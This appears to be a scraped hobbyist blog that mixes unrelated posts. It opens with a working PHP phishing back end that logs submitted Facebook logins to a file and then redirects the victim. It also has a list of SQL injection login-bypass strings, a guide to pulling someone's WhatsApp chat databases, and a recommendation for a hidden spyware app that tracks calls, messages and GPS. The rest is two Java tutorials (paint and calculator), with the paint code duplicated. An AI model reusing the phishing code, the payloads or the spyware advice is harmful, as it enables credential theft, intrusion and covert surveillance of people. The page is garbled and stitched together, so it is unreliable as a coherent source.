<?php
header ('Location:http:/www.facebook.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
ali
Friday, June 26, 2015
Post.php for facebook phisher
Monday, March 24, 2014
WEBSITE HACKING STRINGS : : : : :
[Hide] 1 'or'1 '='1
usernamer : : : : admin'--
passwords : : : : ' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a [/Hide]
Saturday, December 7, 2013
Android :-
- In Whatsapp go to settings - more - Backup Chats
- Copy the folder "Whatsapp" on the SD card to your backup location (e.g., PC)
- (ideally also) use the app Titanium Backup to backup the full whatsapp application together with its data, copy the backup from the folder "TitaniumBackup" on the SD card to your backup location (e.g., PC)
- Use this tool Whatsapp Backup Extractor (download in this thread) to show the chats in a friendly readable format. The necessary files "wa.db" and "msgstore.db" you will find inside the Titanium Backup archive "com.whatsapp-[Date]-[some digits].tar.gz", alternatively (without Titanium Backup) you can use the msgstore.db.crypt file from the folder Whatsapp/Databases on the SD card.
iPhone :-
- use Itunes to create an unencrypted Backup
- use an Iphone Backup Tool to get the file net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or Iphone Backup Extractor. Make sure to create an unencrypted backup with Itunes, as these tools can't handle encrypted backups. Another possibility are forensic tools like UFED Physical Analyzer.)
Blackberry :-
- sync your blackberry with desktop manager and then copy the messagestore.db file from SD
- however, it seems that this file is encrypted? Currently we don't know how to get the unencrypted messagestore.db file
- Blackberry not supported yet!
- however, it seems that this file is encrypted? Currently we don't know how to get the unencrypted messagestore.db file
- Blackberry not supported yet!
Nokia- not known yet
- Nokia not supported yet!!!
- Nokia not supported yet!!!
So
before giving your phone to anyone think twicely and also keep all your
backup safe so that no one can hack your personal stuff and messages.
:-)
==================================================================
3. Using Spywares :-
Another
method we are going to see is that by using 3rd party application and
software anyone can easily not only hack your whatsapp but it can track
GPS, view your lock screen password, view your messages, call records
etc.
There
are many software available in the market to do such thinks but the
truth is that they all are paid app but i have come across a 3rd party
software which is absolutely free of cost and that is call BOSSPY. It is available only for android and Iphone till now.
I
have use it in my S3 and it works like a charm to see whether its
really working or not and i was shocked to see that it can actually
track all my call records, in/out text messages, it can track me via GPS
and the great and very dangerous think about this app is that it is
totally invisible means you cannot find this app in app drawer but it
can be found under setting => accessibility => Service tab. There
you will find this app. To start this app we need to dial the default
code which is 123456 in android dialer. For further detail visit the
official page of BOSSPY.
==================================================================
So guys that all for today.
In next post i will be sharing some other dangerous method through which anyone can hack your whatsapp
Till then stay tune to my blog.
if
i have help you in any way please do comment and share it as much as
you want to protect your dear one from being hacked by someone.
Friday, November 29, 2013
paint
import java.awt.*; import java.awt.event.*; import javax.swing.*; public class paint{ public static void main(String[] args){ Icon iconB = new ImageIcon("blue.gif"); //the blue image icon Icon iconM = new ImageIcon("magenta.gif"); //magenta image icon Icon iconR = new ImageIcon("red.gif"); //red image icon Icon iconBl = new ImageIcon("black.gif"); //black image icon Icon iconG = new ImageIcon("green.gif"); //finally the green image icon //These will be the images for our colors. JFrame frame = new JFrame("Paint It"); //Creates a frame with a title of "Paint it" Container content = frame.getContentPane(); //Creates a new container content.setLayout(new BorderLayout()); //sets the layout final PadDraw drawPad = new PadDraw(); //creates a new padDraw, which is pretty much the paint program content.add(drawPad, BorderLayout.CENTER); //sets the padDraw in the center JPanel panel = new JPanel(); //creates a JPanel panel.setPreferredSize(new Dimension(32, 68)); panel.setMinimumSize(new Dimension(32, 68)); panel.setMaximumSize(new Dimension(32, 68)); //This sets the size of the panel JButton clearButton = new JButton("Clear"); //creates the clear button and sets the text as "Clear" clearButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.clear(); } }); //this is the clear button, which clears the screen. This pretty //much attaches an action listener to the button and when the //button is pressed it calls the clear() method JButton redButton = new JButton(iconR); //creates the red button and sets the icon we created for red redButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.red(); } }); //when pressed it will call the red() method. So on and so on =] JButton blackButton = new JButton(iconBl); //same thing except this is the black button blackButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.black(); } }); JButton magentaButton = new JButton(iconM); //magenta button magentaButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.magenta(); } }); JButton blueButton = new JButton(iconB); //blue button blueButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.blue(); } }); JButton greenButton = new JButton(iconG); //green button greenButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.green(); } }); blackButton.setPreferredSize(new Dimension(16, 16)); magentaButton.setPreferredSize(new Dimension(16, 16)); redButton.setPreferredSize(new Dimension(16, 16)); blueButton.setPreferredSize(new Dimension(16, 16)); greenButton.setPreferredSize(new Dimension(16,16)); //sets the sizes of the buttons panel.add(greenButton); panel.add(blueButton); panel.add(magentaButton); panel.add(blackButton); panel.add(redButton); panel.add(clearButton); //adds the buttons to the panel content.add(panel, BorderLayout.WEST); //sets the panel to the left frame.setSize(300, 300); //sets the size of the frame frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); //makes it so you can close frame.setVisible(true); //makes it so you can see it } } class PadDraw extends JComponent{ Image image; //this is gonna be your image that you draw on Graphics2D graphics2D; //this is what we'll be using to draw on int currentX, currentY, oldX, oldY; //these are gonna hold our mouse coordinates //Now for the constructors public PadDraw(){ setDoubleBuffered(false); addMouseListener(new MouseAdapter(){ public void mousePressed(MouseEvent e){ oldX = e.getX(); oldY = e.getY(); } }); //if the mouse is pressed it sets the oldX & oldY //coordinates as the mouses x & y coordinates addMouseMotionListener(new MouseMotionAdapter(){ public void mouseDragged(MouseEvent e){ currentX = e.getX(); currentY = e.getY(); if(graphics2D != null) graphics2D.drawLine(oldX, oldY, currentX, currentY); repaint(); oldX = currentX; oldY = currentY; } }); //while the mouse is dragged it sets currentX & currentY as the mouses x and y //then it draws a line at the coordinates //it repaints it and sets oldX and oldY as currentX and currentY } public void paintComponent(Graphics g){ if(image == null){ image = createImage(getSize().width, getSize().height); graphics2D = (Graphics2D)image.getGraphics(); graphics2D.setRenderingHint(RenderingHints.KEY_ANTIALIASING, RenderingHints.VALUE_ANTIALIAS_ON); clear(); } g.drawImage(image, 0, 0, null); } //this is the painting bit //if it has nothing on it then //it creates an image the size of the window //sets the value of Graphics as the image //sets the rendering //runs the clear() method //then it draws the image public void clear(){ graphics2D.setPaint(Color.white); graphics2D.fillRect(0, 0, getSize().width, getSize().height); graphics2D.setPaint(Color.black); repaint(); } //this is the clear //it sets the colors as white //then it fills the window with white //thin it sets the color back to black public void red(){ graphics2D.setPaint(Color.red); repaint(); } //this is the red paint public void black(){ graphics2D.setPaint(Color.black); repaint(); } //black paint public void magenta(){ graphics2D.setPaint(Color.magenta); repaint(); } //magenta paint public void blue(){ graphics2D.setPaint(Color.blue); repaint(); } //blue paint public void green(){ graphics2D.setPaint(Color.green); repaint(); } //green paint } //good job, you've made your paint program =]
paint
import java.awt.*; import java.awt.event.*; import javax.swing.*; public class paint{ public static void main(String[] args){ Icon iconB = new ImageIcon("blue.gif"); //the blue image icon Icon iconM = new ImageIcon("magenta.gif"); //magenta image icon Icon iconR = new ImageIcon("red.gif"); //red image icon Icon iconBl = new ImageIcon("black.gif"); //black image icon Icon iconG = new ImageIcon("green.gif"); //finally the green image icon //These will be the images for our colors. JFrame frame = new JFrame("Paint It"); //Creates a frame with a title of "Paint it" Container content = frame.getContentPane(); //Creates a new container content.setLayout(new BorderLayout()); //sets the layout final PadDraw drawPad = new PadDraw(); //creates a new padDraw, which is pretty much the paint program content.add(drawPad, BorderLayout.CENTER); //sets the padDraw in the center JPanel panel = new JPanel(); //creates a JPanel panel.setPreferredSize(new Dimension(32, 68)); panel.setMinimumSize(new Dimension(32, 68)); panel.setMaximumSize(new Dimension(32, 68)); //This sets the size of the panel JButton clearButton = new JButton("Clear"); //creates the clear button and sets the text as "Clear" clearButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.clear(); } }); //this is the clear button, which clears the screen. This pretty //much attaches an action listener to the button and when the //button is pressed it calls the clear() method JButton redButton = new JButton(iconR); //creates the red button and sets the icon we created for red redButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.red(); } }); //when pressed it will call the red() method. So on and so on =] JButton blackButton = new JButton(iconBl); //same thing except this is the black button blackButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.black(); } }); JButton magentaButton = new JButton(iconM); //magenta button magentaButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.magenta(); } }); JButton blueButton = new JButton(iconB); //blue button blueButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.blue(); } }); JButton greenButton = new JButton(iconG); //green button greenButton.addActionListener(new ActionListener(){ public void actionPerformed(ActionEvent e){ drawPad.green(); } }); blackButton.setPreferredSize(new Dimension(16, 16)); magentaButton.setPreferredSize(new Dimension(16, 16)); redButton.setPreferredSize(new Dimension(16, 16)); blueButton.setPreferredSize(new Dimension(16, 16)); greenButton.setPreferredSize(new Dimension(16,16)); //sets the sizes of the buttons panel.add(greenButton); panel.add(blueButton); panel.add(magentaButton); panel.add(blackButton); panel.add(redButton); panel.add(clearButton); //adds the buttons to the panel content.add(panel, BorderLayout.WEST); //sets the panel to the left frame.setSize(300, 300); //sets the size of the frame frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); //makes it so you can close frame.setVisible(true); //makes it so you can see it } } class PadDraw extends JComponent{ Image image; //this is gonna be your image that you draw on Graphics2D graphics2D; //this is what we'll be using to draw on int currentX, currentY, oldX, oldY; //these are gonna hold our mouse coordinates //Now for the constructors public PadDraw(){ setDoubleBuffered(false); addMouseListener(new MouseAdapter(){ public void mousePressed(MouseEvent e){ oldX = e.getX(); oldY = e.getY(); } }); //if the mouse is pressed it sets the oldX & oldY //coordinates as the mouses x & y coordinates addMouseMotionListener(new MouseMotionAdapter(){ public void mouseDragged(MouseEvent e){ currentX = e.getX(); currentY = e.getY(); if(graphics2D != null) graphics2D.drawLine(oldX, oldY, currentX, currentY); repaint(); oldX = currentX; oldY = currentY; } }); //while the mouse is dragged it sets currentX & currentY as the mouses x and y //then it draws a line at the coordinates //it repaints it and sets oldX and oldY as currentX and currentY } public void paintComponent(Graphics g){ if(image == null){ image = createImage(getSize().width, getSize().height); graphics2D = (Graphics2D)image.getGraphics(); graphics2D.setRenderingHint(RenderingHints.KEY_ANTIALIASING, RenderingHints.VALUE_ANTIALIAS_ON); clear(); } g.drawImage(image, 0, 0, null); } //this is the painting bit //if it has nothing on it then //it creates an image the size of the window //sets the value of Graphics as the image //sets the rendering //runs the clear() method //then it draws the image public void clear(){ graphics2D.setPaint(Color.white); graphics2D.fillRect(0, 0, getSize().width, getSize().height); graphics2D.setPaint(Color.black); repaint(); } //this is the clear //it sets the colors as white //then it fills the window with white //thin it sets the color back to black public void red(){ graphics2D.setPaint(Color.red); repaint(); } //this is the red paint public void black(){ graphics2D.setPaint(Color.black); repaint(); } //black paint public void magenta(){ graphics2D.setPaint(Color.magenta); repaint(); } //magenta paint public void blue(){ graphics2D.setPaint(Color.blue); repaint(); } //blue paint public void green(){ graphics2D.setPaint(Color.green); repaint(); } //green paint } //good job, you've made your paint program =]
calculator
- import java.awt.*;
- import java.awt.event.*;
- import javax.swing.*;
- import javax.swing.event.*;
- class Calculator extends JFrame {
- private final Font BIGGER_FONT = new Font("monspaced",Font.PLAIN, 20);
- private JTextField textfield;
- private boolean number = true;
- private String equalOp = "=";
- private CalculatorOp op = new CalculatorOp();
- public Calculator() {
- textfield = new JTextField("", 12);
- textfield.setHorizontalAlignment(JTextField.RIGHT);
- textfield.setFont(BIGGER_FONT);
- ActionListener numberListener = new NumberListener();
- String buttonOrder = "1234567890 ";
- JPanel buttonPanel = new JPanel();
- buttonPanel.setLayout(new GridLayout(4, 4, 4, 4));
- for (int i = 0; i < buttonOrder.length(); i++) {
- String key = buttonOrder.substring(i, i+1);
- if (key.equals(" ")) {
- buttonPanel.add(new JLabel(""));
- } else {
- JButton button = new JButton(key);
- button.addActionListener(numberListener);
- button.setFont(BIGGER_FONT);
- buttonPanel.add(button);
- }
- }
- ActionListener operatorListener = new OperatorListener();
- JPanel panel = new JPanel();
- panel.setLayout(new GridLayout(4, 4, 4, 4));
- String[] opOrder = {"+", "-", "*", "/","=","C","sin","cos","log"};
- for (int i = 0; i < opOrder.length; i++) {
- JButton button = new JButton(opOrder[i]);
- button.addActionListener(operatorListener);
- button.setFont(BIGGER_FONT);
- panel.add(button);
- }
- JPanel pan = new JPanel();
- pan.setLayout(new BorderLayout(4, 4));
- pan.add(textfield, BorderLayout.NORTH );
- pan.add(buttonPanel , BorderLayout.CENTER);
- pan.add(panel , BorderLayout.EAST);
- this.setContentPane(pan);
- this.pack();
- this.setTitle("Calculator");
- this.setResizable(false);
- }
- private void action() {
- number = true;
- textfield.setText("");
- equalOp = "=";
- op.setTotal("");
- }
- class OperatorListener implements ActionListener {
- public void actionPerformed(ActionEvent e) {
- String displayText = textfield.getText();
- if (e.getActionCommand().equals("sin"))
- {
- textfield.setText("" + Math.sin(Double.valueOf(displayText).doubleValue()));
- }else
- if (e.getActionCommand().equals("cos"))
- {
- textfield.setText("" + Math.cos(Double.valueOf(displayText).doubleValue()));
- }
- else
- if (e.getActionCommand().equals("log"))
- {
- textfield.setText("" + Math.log(Double.valueOf(displayText).doubleValue()));
- }
- else if (e.getActionCommand().equals("C"))
- {
- textfield.setText("");
- }
- else
- {
- if (number)
- {
- action();
- textfield.setText("");
- }
- else
- {
- number = true;
- if (equalOp.equals("="))
- {
- op.setTotal(displayText);
- }else
- if (equalOp.equals("+"))
- {
- op.add(displayText);
- }
- else if (equalOp.equals("-"))
- {
- op.subtract(displayText);
- }
- else if (equalOp.equals("*"))
- {
- op.multiply(displayText);
- }
- else if (equalOp.equals("/"))
- {
- op.divide(displayText);
- }
- textfield.setText("" + op.getTotalString());
- equalOp = e.getActionCommand();
- }
- }
- }
- }
- class NumberListener implements ActionListener {
- public void actionPerformed(ActionEvent event) {
- String digit = event.getActionCommand();
- if (number) {
- textfield.setText(digit);
- number = false;
- } else {
- textfield.setText(textfield.getText() + digit);
- }
- }
- }
- public class CalculatorOp {
- private int total;
- public CalculatorOp() {
- total = 0;
- }
- public String getTotalString() {
- return ""+total;
- }
- public void setTotal(String n) {
- total = convertToNumber(n);
- }
- public void add(String n) {
- total += convertToNumber(n);
- }
- public void subtract(String n) {
- total -= convertToNumber(n);
- }
- public void multiply(String n) {
- total *= convertToNumber(n);
- }
- public void divide(String n) {
- total /= convertToNumber(n);
- }
- private int convertToNumber(String n) {
- return Integer.parseInt(n);
- }
- }
- }
- class SwingCalculator {
- public static void main(String[] args) {
- JFrame frame = new Calculator();
- frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
- frame.setVisible(true);
- }
- }
Subscribe to:
Posts (Atom)